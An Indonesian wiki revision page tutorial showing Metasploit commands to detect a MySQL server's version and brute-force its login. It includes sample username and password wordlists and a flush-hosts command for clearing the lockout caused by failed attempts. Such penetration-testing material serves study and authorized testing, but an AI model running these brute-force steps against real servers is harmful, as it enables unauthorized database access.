Difference between revisions of "Kali Linux: MySQL Login"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 7: | Line 7: | ||
msfconsole thankyou | msfconsole thankyou | ||
| + | |||
| + | |||
| + | ==Cek Versi== | ||
| + | |||
| + | use auxiliary/scanner/mysql/mysql_version | ||
| + | show options | ||
| + | set RHOSTS 192.168.0.80 | ||
| + | set THREADS 20 | ||
| + | run | ||
| + | |||
| + | Akan keluar kira-kira | ||
| + | |||
| + | [*] 192.168.0.80:3306 is running MySQL 5.5.35-1ubuntu1 (protocol 10) | ||
| + | [*] Scanned 1 of 1 hosts (100% complete) | ||
| + | [*] Auxiliary module execution completed | ||
==Hack Login== | ==Hack Login== | ||
Revision as of 09:42, 15 February 2016
Sumber: https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/
Aktifkan metasploit
Masuk ke msfconsole
msfconsole thankyou
Cek Versi
use auxiliary/scanner/mysql/mysql_version show options set RHOSTS 192.168.0.80 set THREADS 20 run
Akan keluar kira-kira
[*] 192.168.0.80:3306 is running MySQL 5.5.35-1ubuntu1 (protocol 10) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Hack Login
use auxiliary/scanner/mysql/mysql_login show options set PASS_FILE /tmp/passes.txt set RHOSTS 192.168.0.80 set USER_FILE /tmp/users.txt run
Jika terlalu banyak error saat mencoba, biasanya MySQL akan mengunci / me-lock akses kita. Kita dapat mem-flush lock yang ada di server MySQL menggunakan perintah
mysqladmin flush-hosts mysqladmin -u <username-root> -p<password-root> flush-hosts mysqladmin -u root -p123456 flush-hosts
Siapkan passes.txt dan users.txt
Isi /tmp/passes.txt
12345 123456 1234567 12345678 123456789 secret password p@ssword moodle mediawiki toor s3cr3t
Isi /tmp/users.txt
moodle mediawiki admin root